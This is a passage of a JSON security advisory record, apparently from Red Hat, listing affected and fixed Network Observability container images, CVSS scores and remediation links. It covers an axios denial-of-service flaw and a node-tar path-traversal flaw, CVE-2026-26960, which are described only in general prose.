"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-26960",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-02-20T02:01:07.883769+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441253"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in node-tar. An attacker can craft a malicious archive that, when extracted with default options, creates a hardlink outside the intended extraction directory. This vulnerability allows the attacker to perform arbitrary file read and write operations as the user extracting the archive, bypassing existing path protections. This can lead to unauthorized access and modification of sensitive system files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "tar: node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In Red Hat environments, this condition introduces a significant constraint, as exploitation requires user interaction and reliance on unsafe handling of externally supplied archives. The attack is not remotely exploitable in isolation and depends on a user or service processing attacker-controlled input.\n\nFurthermore, the impact of the vulnerability is limited to the privileges of the extracting process. In typical Red Hat deployments, archive extraction is performed by non-privileged users or within confined environments such as containers or restricted service contexts, which limits the scope of potential damage.\n\nRed Hat analysis also notes that this issue does not provide a direct mechanism for code execution or privilege escalation, but rather enables file system manipulation within the boundaries of the executing user\u2019s permissions.\n\nGiven the requirement for user-assisted exploitation, the absence of a direct remote attack vector, and the confinement of impact to the privileges of the extracting process, Red Hat considers the practical risk to be lower than the generalized NVD assessment. As a result, this vulnerability is classified as Moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x"
],
"known_not_affected": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26960"
},
{
"category": "external",
"summary": "RHBZ#2441253",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441253"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26960",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26960"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384",
"url": "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f",
"url": "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx",
"url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx"
}
],
"release_date": "2026-02-20T01:07:52.979000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
